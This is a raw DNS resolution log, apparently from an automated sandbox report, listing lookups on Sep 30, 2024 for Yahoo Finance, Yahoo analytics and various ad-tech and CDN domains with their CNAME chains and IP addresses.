                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:57.266160011 CEST1.1.1.1192.168.2.40xd0f5No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.419626951 CEST1.1.1.1192.168.2.40x8ff3No error (0)streamer.finance.yahoo.comstreamer.finance-aws-prod.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.419626951 CEST1.1.1.1192.168.2.40x8ff3No error (0)streamer.finance-aws-prod.aws.oath.cloudstreamer-us-east-1.finance-aws-prod.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.419626951 CEST1.1.1.1192.168.2.40x8ff3No error (0)streamer-us-east-1.finance-aws-prod.aws.oath.cloudprod-alb-streamer-1804719662.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.419626951 CEST1.1.1.1192.168.2.40x8ff3No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com35.171.42.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.419626951 CEST1.1.1.1192.168.2.40x8ff3No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com54.209.164.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.419626951 CEST1.1.1.1192.168.2.40x8ff3No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com54.89.126.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.419626951 CEST1.1.1.1192.168.2.40x8ff3No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com18.215.103.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.419626951 CEST1.1.1.1192.168.2.40x8ff3No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com34.197.63.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.419626951 CEST1.1.1.1192.168.2.40x8ff3No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com3.89.175.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.419626951 CEST1.1.1.1192.168.2.40x8ff3No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com52.201.143.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.419626951 CEST1.1.1.1192.168.2.40x8ff3No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com52.86.103.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.453385115 CEST1.1.1.1192.168.2.40x6a5cNo error (0)streamer.finance.yahoo.comstreamer.finance-aws-prod.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.453385115 CEST1.1.1.1192.168.2.40x6a5cNo error (0)streamer.finance-aws-prod.aws.oath.cloudstreamer-us-east-1.finance-aws-prod.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:58.453385115 CEST1.1.1.1192.168.2.40x6a5cNo error (0)streamer-us-east-1.finance-aws-prod.aws.oath.cloudprod-alb-streamer-1804719662.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:02.674963951 CEST1.1.1.1192.168.2.40x7ae1No error (0)jac.yahoosandbox.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:02.674963951 CEST1.1.1.1192.168.2.40x7ae1No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:02.674963951 CEST1.1.1.1192.168.2.40x7ae1No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:02.782852888 CEST1.1.1.1192.168.2.40xc3d1No error (0)jac.yahoosandbox.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.705116034 CEST1.1.1.1192.168.2.40xcc62No error (0)ups.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.705116034 CEST1.1.1.1192.168.2.40xcc62No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.705116034 CEST1.1.1.1192.168.2.40xcc62No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.705116034 CEST1.1.1.1192.168.2.40xcc62No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.705116034 CEST1.1.1.1192.168.2.40xcc62No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.705447912 CEST1.1.1.1192.168.2.40xaa72No error (0)ups.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.705447912 CEST1.1.1.1192.168.2.40xaa72No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.705447912 CEST1.1.1.1192.168.2.40xaa72No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.808753967 CEST1.1.1.1192.168.2.40xdbeeNo error (0)jac.yahoosandbox.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.929285049 CEST1.1.1.1192.168.2.40x7e13No error (0)jac.yahoosandbox.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.929285049 CEST1.1.1.1192.168.2.40x7e13No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.929285049 CEST1.1.1.1192.168.2.40x7e13No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.999298096 CEST1.1.1.1192.168.2.40x5d92No error (0)openweb.jac.yahoosandbox.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.999298096 CEST1.1.1.1192.168.2.40x5d92No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:03.999298096 CEST1.1.1.1192.168.2.40x5d92No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.061450005 CEST1.1.1.1192.168.2.40x6054No error (0)openweb.jac.yahoosandbox.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.230040073 CEST1.1.1.1192.168.2.40xebdfNo error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.230319023 CEST1.1.1.1192.168.2.40x6d72No error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.757538080 CEST1.1.1.1192.168.2.40x7df8No error (0)rtb.openx.net35.227.252.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.757538080 CEST1.1.1.1192.168.2.40x7df8No error (0)rtb.openx.net35.186.253.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.760401011 CEST1.1.1.1192.168.2.40x9089No error (0)ups.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.760401011 CEST1.1.1.1192.168.2.40x9089No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.760401011 CEST1.1.1.1192.168.2.40x9089No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.760401011 CEST1.1.1.1192.168.2.40x9089No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.760401011 CEST1.1.1.1192.168.2.40x9089No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.760412931 CEST1.1.1.1192.168.2.40xb745No error (0)ups.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.760412931 CEST1.1.1.1192.168.2.40xb745No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.760412931 CEST1.1.1.1192.168.2.40xb745No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.770278931 CEST1.1.1.1192.168.2.40xb012No error (0)prebid.media.net34.120.63.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.846708059 CEST1.1.1.1192.168.2.40x7860No error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.851914883 CEST1.1.1.1192.168.2.40x28c6No error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.851914883 CEST1.1.1.1192.168.2.40x28c6No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.851914883 CEST1.1.1.1192.168.2.40x28c6No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.851914883 CEST1.1.1.1192.168.2.40x28c6No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.851914883 CEST1.1.1.1192.168.2.40x28c6No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.993983030 CEST1.1.1.1192.168.2.40xd12bNo error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.993983030 CEST1.1.1.1192.168.2.40xd12bNo error (0)eu-tlx.3lift.com3.124.64.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.993983030 CEST1.1.1.1192.168.2.40xd12bNo error (0)eu-tlx.3lift.com18.157.230.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.993983030 CEST1.1.1.1192.168.2.40xd12bNo error (0)eu-tlx.3lift.com3.78.168.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:04.996016979 CEST1.1.1.1192.168.2.40x22b5No error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.026690960 CEST1.1.1.1192.168.2.40xdfc0No error (0)jac.yahoosandbox.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.026690960 CEST1.1.1.1192.168.2.40xdfc0No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.026690960 CEST1.1.1.1192.168.2.40xdfc0No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.155205011 CEST1.1.1.1192.168.2.40xd7b7No error (0)htlb.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.155205011 CEST1.1.1.1192.168.2.40xd7b7No error (0)htlb.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.155215979 CEST1.1.1.1192.168.2.40x5ce3No error (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.171164989 CEST1.1.1.1192.168.2.40x5e17No error (0)jac.yahoosandbox.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.735306978 CEST1.1.1.1192.168.2.40x7fddNo error (0)pagead-googlehosted.l.google.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.777575970 CEST1.1.1.1192.168.2.40x482No error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.777575970 CEST1.1.1.1192.168.2.40x482No error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.778024912 CEST1.1.1.1192.168.2.40x8d13No error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.778024912 CEST1.1.1.1192.168.2.40x8d13No error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.778024912 CEST1.1.1.1192.168.2.40x8d13No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.212.106.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.778024912 CEST1.1.1.1192.168.2.40x8d13No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud54.154.40.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.778024912 CEST1.1.1.1192.168.2.40x8d13No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.215.101.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.778024912 CEST1.1.1.1192.168.2.40x8d13No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud54.171.151.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.778024912 CEST1.1.1.1192.168.2.40x8d13No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud99.81.68.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:05.778024912 CEST1.1.1.1192.168.2.40x8d13No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud3.251.108.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.269969940 CEST1.1.1.1192.168.2.40xe916No error (0)trc-events.taboola.comam-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.270018101 CEST1.1.1.1192.168.2.40x590eNo error (0)trc-events.taboola.comam-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.270018101 CEST1.1.1.1192.168.2.40x590eNo error (0)am-vip001.taboola.com141.226.228.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.545872927 CEST1.1.1.1192.168.2.40x7452No error (0)api-2-0.spot.imk8s-kongow-generalp-4b9a3bfec6-974801183.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.545895100 CEST1.1.1.1192.168.2.40x98b5No error (0)api-2-0.spot.imk8s-kongow-generalp-f832200e79-1219784492.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.545895100 CEST1.1.1.1192.168.2.40x98b5No error (0)k8s-kongow-generalp-f832200e79-1219784492.us-east-1.elb.amazonaws.com54.197.49.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.545895100 CEST1.1.1.1192.168.2.40x98b5No error (0)k8s-kongow-generalp-f832200e79-1219784492.us-east-1.elb.amazonaws.com3.217.76.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.545895100 CEST1.1.1.1192.168.2.40x98b5No error (0)k8s-kongow-generalp-f832200e79-1219784492.us-east-1.elb.amazonaws.com18.207.87.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.545895100 CEST1.1.1.1192.168.2.40x98b5No error (0)k8s-kongow-generalp-f832200e79-1219784492.us-east-1.elb.amazonaws.com3.213.74.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.546899080 CEST1.1.1.1192.168.2.40xccb0No error (0)static-cdn.spot.imi6v7n3vkjoy.i5w3rm3gfr.ioriveredge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.546899080 CEST1.1.1.1192.168.2.40xccb0No error (0)i6v7n3vkjoy.i5w3rm3gfr.ioriveredge.net108e5aec-1252-4cd8-958e-bafe1b0ab00f.glb.edgio.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.546899080 CEST1.1.1.1192.168.2.40xccb0No error (0)108e5aec-1252-4cd8-958e-bafe1b0ab00f.glb.edgio.nettp01.map.edgio.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.546899080 CEST1.1.1.1192.168.2.40xccb0No error (0)tp01.map.edgio.net152.195.133.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.549429893 CEST1.1.1.1192.168.2.40xb166No error (0)static-cdn.spot.imi6v7n3vkjoy.i5w3rm3gfr.ioriveredge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.549429893 CEST1.1.1.1192.168.2.40xb166No error (0)i6v7n3vkjoy.i5w3rm3gfr.ioriveredge.netdualstack.ioriver.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.584394932 CEST1.1.1.1192.168.2.40x839cNo error (0)publisher-assets.spot.imiiggfj8kzwp.i5w3rm3gfr.ioriveredge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.584394932 CEST1.1.1.1192.168.2.40x839cNo error (0)iiggfj8kzwp.i5w3rm3gfr.ioriveredge.netdualstack.ioriver.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.585695028 CEST1.1.1.1192.168.2.40xac8bNo error (0)publisher-assets.spot.imiiggfj8kzwp.i5w3rm3gfr.ioriveredge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.585695028 CEST1.1.1.1192.168.2.40xac8bNo error (0)iiggfj8kzwp.i5w3rm3gfr.ioriveredge.netdualstack.ioriver.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.585695028 CEST1.1.1.1192.168.2.40xac8bNo error (0)dualstack.ioriver.map.fastly.net199.232.211.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:07.585695028 CEST1.1.1.1192.168.2.40xac8bNo error (0)dualstack.ioriver.map.fastly.net199.232.215.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.162589073 CEST1.1.1.1192.168.2.40x11dcNo error (0)publisher-assets.spot.imiiggfj8kzwp.i5w3rm3gfr.ioriveredge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.162589073 CEST1.1.1.1192.168.2.40x11dcNo error (0)iiggfj8kzwp.i5w3rm3gfr.ioriveredge.netdualstack.ioriver.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.162609100 CEST1.1.1.1192.168.2.40x50daNo error (0)publisher-assets.spot.imiiggfj8kzwp.i5w3rm3gfr.ioriveredge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.162609100 CEST1.1.1.1192.168.2.40x50daNo error (0)iiggfj8kzwp.i5w3rm3gfr.ioriveredge.netd1r2bc6e8cjv9q.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.162609100 CEST1.1.1.1192.168.2.40x50daNo error (0)d1r2bc6e8cjv9q.cloudfront.net13.35.58.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.162609100 CEST1.1.1.1192.168.2.40x50daNo error (0)d1r2bc6e8cjv9q.cloudfront.net13.35.58.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.162609100 CEST1.1.1.1192.168.2.40x50daNo error (0)d1r2bc6e8cjv9q.cloudfront.net13.35.58.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.162609100 CEST1.1.1.1192.168.2.40x50daNo error (0)d1r2bc6e8cjv9q.cloudfront.net13.35.58.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.818244934 CEST1.1.1.1192.168.2.40x68bNo error (0)contextual.media.net88.221.168.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.818254948 CEST1.1.1.1192.168.2.40x4597No error (0)yahoo-bidout-d.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.818254948 CEST1.1.1.1192.168.2.40x4597No error (0)yahoo-bidout-d.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.891779900 CEST1.1.1.1192.168.2.40xb57fNo error (0)navvy.media.net34.160.55.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.913450003 CEST1.1.1.1192.168.2.40x170dNo error (0)hblg.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:08.998171091 CEST1.1.1.1192.168.2.40x9577No error (0)warp.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.002505064 CEST1.1.1.1192.168.2.40x39fNo error (0)direct-events-collector.spot.imk8s-kongow-monitorp-e03b5a49ad-1517292392.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.014365911 CEST1.1.1.1192.168.2.40xce16No error (0)direct-events-collector.spot.imk8s-kongow-monitorp-e03b5a49ad-1517292392.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:09.014365911 CEST1.1.1.1192.168.2.40xce16No error (0)k8s-kongow-monitorp-e03b5a49ad-1517292392.us-east-1.elb.amazonaws.com50.19.126.85A (IP address)IN (0x0001)false
